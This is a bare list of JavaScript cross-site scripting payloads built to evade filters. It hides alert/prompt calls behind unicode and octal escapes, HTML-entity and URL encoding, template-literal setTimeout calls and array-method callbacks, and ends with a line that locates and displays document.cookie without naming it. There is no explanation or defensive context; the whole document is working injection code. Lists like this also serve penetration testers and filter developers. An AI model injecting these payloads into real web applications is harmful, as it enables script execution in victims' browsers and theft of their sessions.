{alert(1)}
(alert)(1)
a=alert,a(1)
a=alert,b=1,()
$=1,alert($)
a=alert,[1].find(a)
a=alert,b=4,[b].find(a)
[1].map(alert)
[1].find(alert)
[1].every(alert)
[1].filter(alert)
[1].findIndex(alert)
'-[1].on*(alert())-'
al\u0065rt(1)
top['al\145rt'](1)
top[8680439..toString(30)](1)
setInterval`alert\x28document.domain\x29`
%26emsp;prompt`${1}`
setTimeout`alert\x28document.domain\x29`
with(document)alert(domain)
a=setTimeout,b=alert,c=document.domain,a`b\x28c\x29`
[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']
('\141\154\145\162\164\50\61\51')()
al\u0065rt%26lpar;1%26rpar;
al\u%26%2348;065rt%26%2340;1%26%2341;
%26%2397;%26%23108;%26%23101;%26%23114;%26%23116;%26lpar;1%26rpar;
%26%2397;%26%23108;%26%23101;%26%23114;%26%23116;%26%2340;1%26%2341;
self['\x61\x6c\x65\x72\x74']%26lpar;'\x58\x53\x53'%29
top.open`javas\cript:al\ert(1)`
foo=[123,666,999]
a=top[Object.keys(top).filter((v)=>{if(/^do/.test(v))return 1})];for(i in a)if(/ie$/.test(i))alert(a[i])